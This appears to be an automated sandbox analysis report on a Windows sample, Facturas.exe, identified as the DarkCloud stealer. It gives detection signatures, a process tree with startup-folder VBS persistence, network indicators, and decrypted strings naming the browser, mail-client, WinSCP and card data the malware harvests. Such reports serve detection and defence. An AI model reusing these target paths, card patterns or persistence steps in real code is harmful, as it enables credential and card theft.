Edit tour

Windows Analysis Report
Facturas.exe

Overview

General Information

Sample name:	Facturas.exe
Analysis ID:	1541874
MD5:	af60907e3d43618d4db0730aef26e7dd
SHA1:	8afc3704d1053147ef397913ee55125d7b5f5c27
SHA256:	445b43c35311fcebb9f753c4572ba882d23cb73be51128f8fbb21c3af60db51e
Tags:	exeuser-lowmal3
Infos:

Detection

DarkCloud

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected DarkCloud

Yara detected Generic Dropper

.NET source code contains potential unpacker

AI detected suspicious sample

Drops VBS files to the startup folder

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes or reads registry keys via WMI

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

May check the online IP address of the machine

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Facturas.exe (PID: 7004 cmdline: "C:\Users\user\Desktop\Facturas.exe" MD5: AF60907E3D43618D4DB0730AEF26E7DD)

InstallUtil.exe (PID: 5652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

wscript.exe (PID: 7356 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

Id.exe (PID: 7412 cmdline: "C:\Users\user\AppData\Roaming\Id.exe" MD5: AF60907E3D43618D4DB0730AEF26E7DD)

InstallUtil.exe (PID: 7444 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkCloud Stealer	Stealer is written in Visual Basic.	No Attribution	https://asec.ahnlab.com/en/53128/ https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/	https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.1411737595.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0000000D.00000002.1411737595.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x41544:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
00000000.00000002.1260940324.0000000005B70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1256345226.0000000004070000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
00000000.00000002.1256345226.0000000004070000.00000004.00000800.00020000.00000000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x393c:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000D.00000002.1411737595.0000000003D59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0000000D.00000002.1411737595.0000000003D59000.00000004.00000800.00020000.00000000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x5b94:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000000.00000002.1256345226.0000000003F10000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
00000000.00000002.1256345226.0000000003F10000.00000004.00000800.00020000.00000000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0xbc364:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000000.00000002.1248872319.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.1411737595.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.1393116166.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Facturas.exe PID: 7004	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Process Memory Space: Facturas.exe PID: 7004	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Facturas.exe PID: 7004	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: Facturas.exe PID: 7004	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Id.exe PID: 7412	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Process Memory Space: Id.exe PID: 7412	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Id.exe PID: 7412	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: Id.exe PID: 7412	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 7444	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.Facturas.exe.5b70000.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
13.2.Id.exe.3ff6f40.2.raw.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
13.2.Id.exe.3ff6f40.2.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0.2.Facturas.exe.3fc7d60.3.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0.2.Facturas.exe.3fc7d60.3.raw.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
13.2.Id.exe.3e666f0.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs" , ProcessId: 7356, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs" , ProcessId: 7356, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Facturas.exe, ProcessId: 7004, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T09:12:06.154194+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49699	162.55.60.2	80	TCP
2024-10-25T09:12:30.955712+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49791	162.55.60.2	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Facturas.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Id.exe

Avira: detection malicious, Label: HEUR/AGEN.1310705

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Id.exe

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: Facturas.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Id.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Facturas.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: Cookies
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: \Default\Login Data
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: \Login Data
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: Password :
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: //setting[@name='Password']/value
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: SMTP Email Address
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: NNTP Email Address
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: Email
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: HTTPMail User Name
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: HTTPMail Server
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^3[47][0-9]{13}$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^(6541\|6556)[0-9]{12}$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^389[0-9]{11}$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^3(?:0[0-5]\|[68][0-9])[0-9]{11}$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^63[7-9][0-9]{13}$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^(?:2131\|1800\|35\\d{3})\\d{11}$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^9[0-9]{15}$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^(6304\|6706\|6709\|6771)[0-9]{12,15}$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^(5018\|5020\|5038\|6304\|6759\|6761\|6763)[0-9]{8,15}$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: Mastercard
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^(6334\|6767)[0-9]{12}\|(6334\|6767)[0-9]{14}\|(6334\|6767)[0-9]{15}$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^(62[0-9]{14,17})$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{12}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{14}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{15}\|564182[0-9]{10}\|564182[0-9]{12}\|564182[0-9]{13}\|633110[0-9]{10}\|633110[0-9]{12}\|633110[0-9]{13}$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: Visa Card
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?\|5[1-5][0-9]{14})$
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: Visa Master Card
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: \logins.json
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: \signons.sqlite
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: Foxmail.exe
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: mail\
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: \Accounts\Account.rec0
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: \AccCfg\Accounts.tdat
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: EnableSignature
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: Application : FoxMail
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: encryptedUsername
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: logins
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: encryptedPassword
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/sendusing
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpauthenticate
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: mail.baleromex.com
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpserver
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpserverport
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpusessl
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/sendusername
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/sendpassword
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: \Default\Cookies
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: \Cookies
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: \cookies.sqlite
Source: 13.2.Id.exe.3ff6f40.2.unpack	String decryptor: \cookies.db

Source: Facturas.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Facturas.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Facturas.exe, 00000000.00000002.1248872319.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Facturas.exe, 00000000.00000002.1261777030.0000000005C80000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1393116166.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: W.pdb4 source: Facturas.exe, 00000000.00000002.1248872319.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, Facturas.exe, 00000000.00000002.1256345226.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Facturas.exe, 00000000.00000002.1256345226.0000000004070000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1393116166.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2479512482.000000000043F000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Facturas.exe, 00000000.00000002.1248872319.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Facturas.exe, 00000000.00000002.1261777030.0000000005C80000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1393116166.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp

Source: Joe Sandbox View

IP Address: 162.55.60.2 162.55.60.2

Source: unknown

DNS query: name: showip.net

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 162.55.60.2:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49791 -> 162.55.60.2:80

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 14_2_00435A20 InternetOpenA,InternetOpenUrlA,InternetReadFile,

14_2_00435A20

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net

Source: global traffic

DNS traffic detected: DNS query: showip.net

Source: Facturas.exe, 00000000.00000002.1248872319.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Facturas.exe, 00000000.00000002.1248872319.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1393116166.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net
Source: InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/
Source: InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/R
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/Z
Source: InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/e1
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/g
Source: InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.netdD
Source: InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.nets
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.netth?
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.00000000011DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1
Source: Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003D59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Facturas.exe, 00000000.00000002.1248872319.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1393116166.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.00000000011DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000D.00000002.1411737595.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.1256345226.0000000004070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000D.00000002.1411737595.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.1256345226.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Writes or reads registry keys via WMI

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
